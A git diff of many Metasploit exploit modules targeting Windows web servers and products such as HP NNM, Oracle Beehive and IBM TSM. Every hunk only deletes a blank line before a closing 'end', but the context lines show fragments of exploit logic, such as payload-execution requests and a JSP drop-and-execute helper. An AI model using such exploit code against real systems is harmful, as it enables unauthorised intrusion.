a/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb b/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb index d0504f7a46..b295a4b6ac 100644 --- a/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb +++ b/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb @@ -73,5 +73,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/http/cogent_datahub_command.rb b/modules/exploits/windows/http/cogent_datahub_command.rb index fbc9abb865..bd81d039f4 100644 --- a/modules/exploits/windows/http/cogent_datahub_command.rb +++ b/modules/exploits/windows/http/cogent_datahub_command.rb @@ -441,5 +441,4 @@ class MetasploitModule < Msf::Exploit::Remote end end end - end diff --git a/modules/exploits/windows/http/cyclope_ess_sqli.rb b/modules/exploits/windows/http/cyclope_ess_sqli.rb index 23ff29daf7..9972ed4def 100644 --- a/modules/exploits/windows/http/cyclope_ess_sqli.rb +++ b/modules/exploits/windows/http/cyclope_ess_sqli.rb @@ -170,5 +170,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/http/easyftp_list.rb b/modules/exploits/windows/http/easyftp_list.rb index 6b5706b048..b0a35887f0 100644 --- a/modules/exploits/windows/http/easyftp_list.rb +++ b/modules/exploits/windows/http/easyftp_list.rb @@ -119,5 +119,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/http/edirectory_host.rb b/modules/exploits/windows/http/edirectory_host.rb index 0963b1244f..7f2ee55837 100644 --- a/modules/exploits/windows/http/edirectory_host.rb +++ b/modules/exploits/windows/http/edirectory_host.rb @@ -65,5 +65,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/http/edirectory_imonitor.rb b/modules/exploits/windows/http/edirectory_imonitor.rb index 759591a856..2e7e26d983 100644 --- a/modules/exploits/windows/http/edirectory_imonitor.rb +++ b/modules/exploits/windows/http/edirectory_imonitor.rb @@ -68,5 +68,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/http/efs_easychatserver_username.rb b/modules/exploits/windows/http/efs_easychatserver_username.rb index be513d6d53..10869d54f9 100644 --- a/modules/exploits/windows/http/efs_easychatserver_username.rb +++ b/modules/exploits/windows/http/efs_easychatserver_username.rb @@ -138,7 +138,6 @@ class MetasploitModule < Msf::Exploit::Remote }, 5) end - end =begin diff --git a/modules/exploits/windows/http/ericom_access_now_bof.rb b/modules/exploits/windows/http/ericom_access_now_bof.rb index 4b0a26bd1d..07d0937c80 100644 --- a/modules/exploits/windows/http/ericom_access_now_bof.rb +++ b/modules/exploits/windows/http/ericom_access_now_bof.rb @@ -129,5 +129,4 @@ class MetasploitModule < Msf::Exploit::Remote rop_gadgets end - end diff --git a/modules/exploits/windows/http/fdm_auth_header.rb b/modules/exploits/windows/http/fdm_auth_header.rb index 956a8a7998..050fa22a4d 100644 --- a/modules/exploits/windows/http/fdm_auth_header.rb +++ b/modules/exploits/windows/http/fdm_auth_header.rb @@ -67,5 +67,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end - end diff --git a/modules/exploits/windows/http/hp_autopass_license_traversal.rb b/modules/exploits/windows/http/hp_autopass_license_traversal.rb index cc74ee8eff..5e96c0111e 100644 --- a/modules/exploits/windows/http/hp_autopass_license_traversal.rb +++ b/modules/exploits/windows/http/hp_autopass_license_traversal.rb @@ -251,5 +251,4 @@ class MetasploitModule < Msf::Exploit::Remote res end - end diff --git a/modules/exploits/windows/http/hp_imc_bims_upload.rb b/modules/exploits/windows/http/hp_imc_bims_upload.rb index 36aebac3fe..00b8f3e152 100644 --- a/modules/exploits/windows/http/hp_imc_bims_upload.rb +++ b/modules/exploits/windows/http/hp_imc_bims_upload.rb @@ -104,5 +104,4 @@ class MetasploitModule < Msf::Exploit::Remote }, 1) end - end diff --git a/modules/exploits/windows/http/hp_imc_mibfileupload.rb b/modules/exploits/windows/http/hp_imc_mibfileupload.rb index 440601ca5d..95f435b2d4 100644 --- a/modules/exploits/windows/http/hp_imc_mibfileupload.rb +++ b/modules/exploits/windows/http/hp_imc_mibfileupload.rb @@ -107,5 +107,4 @@ class MetasploitModule < Msf::Exploit::Remote }) end - end diff --git a/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb b/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb index 1e78ebdf39..32741a3b25 100644 --- a/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb +++ b/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb @@ -266,5 +266,4 @@ class MetasploitModule < Msf::Exploit::Remote return nil end - end diff --git a/modules/exploits/windows/http/hp_mpa_job_acct.rb b/modules/exploits/windows/http/hp_mpa_job_acct.rb index 9b322ddb25..dc81e9b5d2 100644 --- a/modules/exploits/windows/http/hp_mpa_job_acct.rb +++ b/modules/exploits/windows/http/hp_mpa_job_acct.rb @@ -240,6 +240,5 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Executing payload through #{payload_url}...") send_request_cgi({ 'uri' => payload_url}) end - end diff --git a/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb b/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb index bc8946c211..18259b0553 100644 --- a/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb +++ b/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb @@ -79,5 +79,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb b/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb index e1fa054c01..643d704596 100644 --- a/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb +++ b/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb @@ -79,5 +79,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb b/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb index 007a0ff4eb..b022f9655b 100644 --- a/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb +++ b/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb @@ -79,5 +79,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/http/hp_nnm_openview5.rb b/modules/exploits/windows/http/hp_nnm_openview5.rb index 2f4034266e..ccc9a4f675 100644 --- a/modules/exploits/windows/http/hp_nnm_openview5.rb +++ b/modules/exploits/windows/http/hp_nnm_openview5.rb @@ -58,5 +58,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb index add77af43f..b9c9d5a393 100644 --- a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb +++ b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb @@ -95,7 +95,6 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end =begin diff --git a/modules/exploits/windows/http/hp_nnm_ovas.rb b/modules/exploits/windows/http/hp_nnm_ovas.rb index 50c4ad3ffb..3660e17a48 100644 --- a/modules/exploits/windows/http/hp_nnm_ovas.rb +++ b/modules/exploits/windows/http/hp_nnm_ovas.rb @@ -192,5 +192,4 @@ class MetasploitModule < Msf::Exploit::Remote return Exploit::CheckCode::Safe end - end diff --git a/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb b/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb index 511c6f6f55..fa747edfde 100644 --- a/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb +++ b/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb @@ -238,7 +238,6 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end =begin diff --git a/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb b/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb index 3a64dfde96..97be939252 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb @@ -59,5 +59,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb index 4eee2b2787..9f75bd46ae 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb @@ -163,5 +163,4 @@ class MetasploitModule < Msf::Exploit::Remote def wfs_delay 5 end - end diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb index abb33a9a93..5d872d4d64 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb @@ -167,5 +167,4 @@ class MetasploitModule < Msf::Exploit::Remote def wfs_delay 5 end - end diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb index 81a63268a9..1e6da8a346 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb @@ -134,5 +134,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb b/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb index e26d1d30d4..e53731579c 100644 --- a/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb +++ b/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb @@ -170,5 +170,4 @@ class MetasploitModule < Msf::Exploit::Remote def wfs_delay 5 end - end diff --git a/modules/exploits/windows/http/hp_nnm_toolbar_01.rb b/modules/exploits/windows/http/hp_nnm_toolbar_01.rb index 9e54ef3cac..34784eac62 100644 --- a/modules/exploits/windows/http/hp_nnm_toolbar_01.rb +++ b/modules/exploits/windows/http/hp_nnm_toolbar_01.rb @@ -59,5 +59,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/http/hp_nnm_toolbar_02.rb b/modules/exploits/windows/http/hp_nnm_toolbar_02.rb index bfa2c5b120..d2ea70bccd 100644 --- a/modules/exploits/windows/http/hp_nnm_toolbar_02.rb +++ b/modules/exploits/windows/http/hp_nnm_toolbar_02.rb @@ -138,7 +138,6 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb index f3400b003e..c4cc392d89 100644 --- a/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb +++ b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb @@ -159,5 +159,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb b/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb index a0f28ae4ab..8614e87ca7 100644 --- a/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb +++ b/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb @@ -128,5 +128,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Executing payload...") send_request_cgi({ 'uri' => "/RegWeb/#{jsp}" }) end - end diff --git a/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb b/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb index 515d5525f4..4200647181 100644 --- a/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb +++ b/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb @@ -126,5 +126,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Executing payload...") send_request_cgi({ 'uri' => "/RegWeb/#{jsp}" }) end - end diff --git a/modules/exploits/windows/http/hp_power_manager_login.rb b/modules/exploits/windows/http/hp_power_manager_login.rb index 334c127800..6d231156fa 100644 --- a/modules/exploits/windows/http/hp_power_manager_login.rb +++ b/modules/exploits/windows/http/hp_power_manager_login.rb @@ -78,5 +78,4 @@ class MetasploitModule < Msf::Exploit::Remote select(nil,nil,nil,5) handler end - end diff --git a/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb b/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb index 40c3d66669..9a3cd2d8a0 100644 --- a/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb +++ b/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb @@ -164,5 +164,4 @@ class MetasploitModule < Msf::Exploit::Remote return res end - end diff --git a/modules/exploits/windows/http/httpdx_handlepeer.rb b/modules/exploits/windows/http/httpdx_handlepeer.rb index 5d8801344c..546b78c23b 100644 --- a/modules/exploits/windows/http/httpdx_handlepeer.rb +++ b/modules/exploits/windows/http/httpdx_handlepeer.rb @@ -119,5 +119,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/http/httpdx_tolog_format.rb b/modules/exploits/windows/http/httpdx_tolog_format.rb index 7e1adcdfaf..1a28fd1da3 100644 --- a/modules/exploits/windows/http/httpdx_tolog_format.rb +++ b/modules/exploits/windows/http/httpdx_tolog_format.rb @@ -222,7 +222,6 @@ For now, that will have to be done manually. end nil end - end diff --git a/modules/exploits/windows/http/ia_webmail.rb b/modules/exploits/windows/http/ia_webmail.rb index ccebeb3e51..1db570e147 100644 --- a/modules/exploits/windows/http/ia_webmail.rb +++ b/modules/exploits/windows/http/ia_webmail.rb @@ -59,5 +59,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb b/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb index 28e4f94b70..57a7b0f3bf 100644 --- a/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb +++ b/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb @@ -219,5 +219,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/http/ibm_tsm_cad_header.rb b/modules/exploits/windows/http/ibm_tsm_cad_header.rb index a63bf16423..0856cd1314 100644 --- a/modules/exploits/windows/http/ibm_tsm_cad_header.rb +++ b/modules/exploits/windows/http/ibm_tsm_cad_header.rb @@ -59,5 +59,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/http/icecast_header.rb b/modules/exploits/windows/http/icecast_header.rb index 92f38c5951..ae94ff436a 100644 --- a/modules/exploits/windows/http/icecast_header.rb +++ b/modules/exploits/windows/http/icecast_header.rb @@ -85,5 +85,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb b/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb index aef63d6142..df53145b9c 100644 --- a/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb +++ b/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb @@ -78,5 +78,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/http/jira_collector_traversal.rb b/modules/exploits/windows/http/jira_collector_traversal.rb index 575fdc8209..35048367b0 100644 --- a/modules/exploits/windows/http/jira_collector_traversal.rb +++ b/modules/exploits/windows/http/jira_collector_traversal.rb @@ -203,5 +203,4 @@ class MetasploitModule < Msf::Exploit::Remote def jsp_drop_and_execute(bin_data, output_file) jsp_drop_bin(bin_data, output_file) + jsp_execute_command(output_file) end - end diff --git a/modules/exploits/windows/http/kolibri_http.rb b/modules/exploits/windows/http/kolibri_http.rb index ac350a8538..2ace18c8ed 100644 --- a/modules/exploits/windows/http/kolibri_http.rb +++ b/modules/exploits/windows/http/kolibri_http.rb @@ -72,5 +72,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb b/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb index df6ad00a90..25412541c6 100644 --- a/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb +++ b/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb @@ -169,5 +169,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb b/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb index 968c8d99b3..342381e600 100644 --- a/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb +++ b/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb @@ -149,5 +149,4 @@ out.println("Path:" + System.getProperty("catalina.home")); jsp end - end diff --git a/modules/exploits/windows/http/mailenable_auth_header.rb b/modules/exploits/windows/http/mailenable_auth_header.rb index e12234a813..a0c60f1133 100644 --- a/modules/exploits/windows/http/mailenable_auth_header.rb +++ b/modules/exploits/windows/http/mailenable_auth_header.rb @@ -62,5 +62,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb index 2ed731adfd..853452c19c 100644 --- a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb +++ b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb @@ -178,5 +178,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/windows/http/manageengine_connectionid_write.rb b/modules/exploits/windows/http/manageengine_connectionid_write.rb index 5b6a63d9e4..a9e7481238 100644 --- a/modules/exploits/windows/http/manageengine_connectionid_write.rb +++ b/modules/exploits/windows/http/manageengine_connectionid_write.rb @@ -203,6 +203,5 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Executing stager...") exec_jsp(stager_info) end - end diff --git a/modules/exploits/windows/http/maxdb_webdbm_database.rb b/modules/exploits/windows/http/maxdb_webdbm_database.rb index 3c61f0ff5e..65cbe35f37 100644 --- a/modules/exploits/windows/http/maxdb_webdbm_database.rb +++ b/modules/exploits/windows/http/maxdb_webdbm_database.rb @@ -78,5 +78,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb b/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb index 123b49cf27..404ccab335 100644 --- a/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb +++ b/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb @@ -74,5 +74,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/http/mcafee_epolicy_source.rb b/modules/exploits/windows/http/mcafee_epolicy_source.rb index 6bbe214e46..c2f0c5cf81 100644 --- a/modules/exploits/windows/http/mcafee_epolicy_source.rb +++ b/modules/exploits/windows/http/mcafee_epolicy_source.rb @@ -101,5 +101,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect handler end - end diff --git a/modules/exploits/windows/http/minishare_get_overflow.rb b/modules/exploits/windows/http/minishare_get_overflow.rb index 7209bc4119..54f1fe7d03 100644 --- a/modules/exploits/windows/http/minishare_get_overflow.rb +++ b/modules/exploits/windows/http/minishare_get_overflow.rb @@ -71,5 +71,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/http/miniweb_upload_wbem.rb b/modules/exploits/windows/http/miniweb_upload_wbem.rb index 1f6bf68595..cdf21c785a 100644 --- a/modules/exploits/windows/http/miniweb_upload_wbem.rb +++ b/modules/exploits/windows/http/miniweb_upload_wbem.rb @@ -129,5 +129,4 @@ class MetasploitModule < Msf::Exploit::Remote register_file_for_cleanup("#{::File.basename(exe_name)}") register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}") end - end diff --git a/modules/exploits/windows/http/navicopa_get_overflow.rb b/modules/exploits/windows/http/navicopa_get_overflow.rb index c68f67e5bf..8184483aef 100644 --- a/modules/exploits/windows/http/navicopa_get_overflow.rb +++ b/modules/exploits/windows/http/navicopa_get_overflow.rb @@ -82,5 +82,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/http/novell_mdm_lfi.rb b/modules/exploits/windows/http/novell_mdm_lfi.rb index 06e0503324..995bb9c4c9 100644 --- a/modules/exploits/windows/http/novell_mdm_lfi.rb +++ b/modules/exploits/windows/http/novell_mdm_lfi.rb @@ -153,5 +153,4 @@ class MetasploitModule < Msf::Exploit::Remote return if(e.to_s.match(/^SSL_connect /) ) # strange errors / exception if SSL connection aborted end end - end diff --git a/modules/exploits/windows/http/novell_messenger_acceptlang.rb b/modules/exploits/windows/http/novell_messenger_acceptlang.rb index 220e1d4c51..909bf648cd 100644 --- a/modules/exploits/windows/http/novell_messenger_acceptlang.rb +++ b/modules/exploits/windows/http/novell_messenger_acceptlang.rb @@ -64,5 +64,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/http/nowsms.rb b/modules/exploits/windows/http/nowsms.rb index b5c2f72557..7e66c69a6c 100644 --- a/modules/exploits/windows/http/nowsms.rb +++ b/modules/exploits/windows/http/nowsms.rb @@ -64,5 +64,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/http/oracle9i_xdb_pass.rb b/modules/exploits/windows/http/oracle9i_xdb_pass.rb index f123dfe583..19e0bb18c0 100644 --- a/modules/exploits/windows/http/oracle9i_xdb_pass.rb +++ b/modules/exploits/windows/http/oracle9i_xdb_pass.rb @@ -84,5 +84,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/http/oracle_beehive_evaluation.rb b/modules/exploits/windows/http/oracle_beehive_evaluation.rb index e86f400bcc..08c437813e 100644 --- a/modules/exploits/windows/http/oracle_beehive_evaluation.rb +++ b/modules/exploits/windows/http/oracle_beehive_evaluation.rb @@ -149,6 +149,5 @@ class MetasploitModule < Msf::Exploit::Remote def print_status(msg) super("#{rhost}:#{rport} - #{msg}") end - end diff --git a/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb b/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb index 47b647c15e..a1ee1a2260 100644 --- a/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb +++ b/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb @@ -144,5 +144,4 @@ class MetasploitModule < Msf::Exploit::Remote def print_status(msg) super("#{rhost}:#{rport} - #{msg}") end - end diff --git a/modules/exploits/windows/http/oracle_btm_writetofile.rb b/modules/exploits/windows/http/oracle_btm_writetofile.rb index cfb6176b87..6f4d9f768f 100644 --- a/modules/exploits/windows/http/oracle_btm_writetofile.rb +++ b/modules/exploits/windows/http/oracle_btm_writetofile.rb @@ -264,5 +264,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/windows/http/oracle_endeca_exec.rb b/modules/exploits/windows/http/oracle_endeca_exec.rb index 46a88d3cff..c12338f47a 100644 --- a/modules/exploits/windows/http/oracle_endeca_exec.rb +++ b/modules/exploits/windows/http/oracle_endeca_exec.rb @@ -149,5 +149,4 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::Unreachable, "#{peer} - Unable to connect") end end - end diff --git a/modules/exploits/windows/http/oracle_event_processing_upload.rb b/modules/exploits/windows/http/oracle_event_processing_upload.rb index 19eeabf466..f57679399d 100644 --- a/modules/exploits/windows/http/oracle_event_processing_upload.rb +++ b/modules/exploits/windows/http/oracle_event_processing_upload.rb @@ -126,5 +126,4 @@ class MetasploitModule < Msf::Exploit::Remote Exploit::CheckCode::Unknown end - end diff --git a/modules/exploits/windows/http/peercast_url.rb b/modules/exploits/windows/http/peercast_url.rb index 20844d21d1..f691cfd7a4 100644 --- a/modules/exploits/windows/http/peercast_url.rb +++ b/modules/exploits/windows/http/peercast_url.rb @@ -63,5 +63,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/http/privatewire_gateway.rb b/modules/exploits/windows/http/privatewire_gateway.rb index 8d70113620..9b6ef56d38 100644 --- a/modules/exploits/windows/http/privatewire_gateway.rb +++ b/modules/exploits/windows/http/privatewire_gateway.rb @@ -69,5 +69,4 @@ class MetasploitModule < Msf::Exploit::Remote 'uri' => "/" + pattern }, 2) end - end diff --git a/modules/exploits/windows/http/sapdb_webtools.rb b/modules/exploits/windows/http/sapdb_webtools.rb index d957873116..c8c315e7d1 100644 --- a/modules/exploits/windows/http/sapdb_webtools.rb +++ b/modules/exploits/windows/http/sapdb_webtools.rb @@ -72,5 +72,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/http/savant_31_overflow.rb b/modules/exploits/windows/http/savant_31_overflow.rb index 124795cb71..9a19a65412 100644 --- a/modules/exploits/windows/http/savant_31_overflow.rb +++ b/modules/exploits/windows/http/savant_31_overflow.rb @@ -116,5 +116,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/http/servu_session_cookie.rb b/modules/exploits/windows/http/servu_session_cookie.rb index 89f2cf0840..ef880dec30 100644 --- a/modules/exploits/windows/http/servu_session_cookie.rb +++ b/modules/exploits/windows/http/servu_session_cookie.rb @@ -125,5 +125,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/http/shoutcast_format.rb b/modules/exploits/windows/http/shoutcast_format.rb index a0cb44d262..4eb8d7cfef 100644 --- a/modules/exploits/windows/http/shoutcast_format.rb +++ b/modules/exploits/windows/http/shoutcast_format.rb @@ -94,5 +94,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/http/shttpd_post.rb b/modules/exploits/windows/http/shttpd_post.rb index 851400d9cb..c5c3f31582 100644 --- a/modules/exploits/windows/http/shttpd_post.rb +++ b/modules/exploits/windows/http/shttpd_post.rb @@ -71,5 +71,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb b/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb index 8c410f9867..ee1d08cf9f 100644 --- a/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb +++ b/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb @@ -235,6 +235,5 @@ class MetasploitModule < Msf::Exploit::Remote def print_status(msg) super("#{rhost}:#{rport} - #{msg}") end - end diff --git a/modules/exploits/windows/http/steamcast_useragent.rb b/modules/exploits/windows/http/steamcast_useragent.rb index 917b984f2d..e0b755c815 100644 --- a/modules/exploits/windows/http/steamcast_useragent.rb +++ b/modules/exploits/windows/http/steamcast_useragent.rb @@ -82,5 +82,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/http/sybase_easerver.rb b/modules/exploits/windows/http/sybase_easerver.rb index b6915c74bb..f48c916247 100644 --- a/modules/exploits/windows/http/sybase_easerver.rb +++ b/modules/exploits/windows/http/sybase_easerver.rb @@ -80,5 +80,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Overflow request sent, sleeping for four seconds") select(nil,nil,nil,4) end - end diff --git a/modules/exploits/windows/http/trackercam_phparg_overflow.rb b/modules/exploits/windows/http/trackercam_phparg_overflow.rb index 55175f9b48..7e1b51bf26 100644 --- a/modules/exploits/windows/http/trackercam_phparg_overflow.rb +++ b/modules/exploits/windows/http/trackercam_phparg_overflow.rb @@ -144,5 +144,4 @@ class MetasploitModule < Msf::Exploit::Remote return "Unknown OS/SP" end end - end diff --git a/modules/exploits/windows/http/trendmicro_officescan.rb b/modules/exploits/windows/http/trendmicro_officescan.rb index 91b79d9386..35976e7227 100644 --- a/modules/exploits/windows/http/trendmicro_officescan.rb +++ b/modules/exploits/windows/http/trendmicro_officescan.rb @@ -98,5 +98,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb b/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb index 5dc470b4b7..f6f7fe6620 100644 --- a/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb +++ b/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb @@ -193,5 +193,4 @@ class MetasploitModule < Msf::Exploit::Remote def jsp_drop_and_execute(bin_data, output_file) jsp_drop_bin(bin_data, output_file) + jsp_execute_command(output_file) end - end diff --git a/modules/exploits/windows/http/webster_http.rb b/modules/exploits/windows/http/webster_http.rb index a8eb325854..e288eedfa9 100644 --- a/modules/exploits/windows/http/webster_http.rb +++ b/modules/exploits/windows/http/webster_http.rb @@ -54,5 +54,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/http/xampp_webdav_upload_php.rb b/modules/exploits/windows/http/xampp_webdav_upload_php.rb index 64ccaa6ed4..4c0b7a4cfe 100644 --- a/modules/exploits/windows/http/xampp_webdav_upload_php.rb +++ b/modules/exploits/windows/http/xampp_webdav_upload_php.rb @@ -74,5 +74,4 @@ class MetasploitModule < Msf::Exploit::Remote end return uri_path end - end diff --git a/modules/exploits/windows/http/xitami_if_mod_since.rb b/modules/exploits/windows/http/xitami_if_mod_since.rb index 